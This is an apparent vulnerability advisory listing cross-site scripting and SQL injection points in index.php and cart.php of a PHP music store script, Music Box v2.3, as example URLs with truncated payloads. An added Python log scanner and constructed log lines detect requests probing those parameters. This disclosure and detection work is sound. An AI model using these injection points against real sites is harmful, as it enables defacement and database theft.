
XSS & SQL Injection in Music Box v2.3



Hello
Vulnerable: Music Box v2.3
http://www.MusicboxV2.com 

Exploit:
XSS:
http://example.com/music/index.php?id='> 

http://example.com/music/index.php?action=top&show=5&type='> 

http://example.com/music/index.php?action=top&show='>&type=Artists 

http://example.com/music/cart/cart.php?message1='> 

http://example.com/music/cart/cart.php?message='> 

SQL:
http://example.com/music/index.php?action=top&show=5&type=[SQL] 

http://example.com/music/index.php?action=top&show=[SQL]&type=Artists 


Discovery by Linux_Drox

http://www.lezr.com 

Best Regards,
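For defenders reviewing web server logs, the following added example (not part of the original advisory and not Music Box code) flags requests to the scripts and parameters listed above whose values contain markup-breaking characters or, for `show`, are not numeric. The log lines are constructed samples, and treating `show` as an integer is an assumption based on the benign value `show=5` in the advisory's URLs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts and parameters named in the advisory.
WATCHED = {
    "index.php": {"id", "show", "type"},
    "cart.php": {"message", "message1"},
}
MARKUP_CHARS = set("'\"<>")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def suspicious_params(url):
    """Return sorted (parameter, reason) pairs for one request URL."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    watched = WATCHED.get(script, set())
    findings = set()
    # parse_qs percent-decodes values, so %27%3E is checked as '>
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in watched:
            continue
        for value in values:
            if MARKUP_CHARS & set(value):
                findings.add((name, "markup-breaking character"))
            elif name == "show" and not value.isdigit():
                # Assumption: show is a row count and should be an integer.
                findings.add((name, "non-numeric value"))
    return sorted(findings)

def scan(lines):
    """Return (line_number, findings) for each access-log line with findings."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        found = suspicious_params(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /music/index.php?action=top&show=5&type=Artists HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /music/index.php?action=top&show=5&type=%27%3E HTTP/1.1" 200 5300',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /music/cart/cart.php?message1=%27%3E HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /music/index.php?action=top&show=five&type=Artists HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, found)
```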
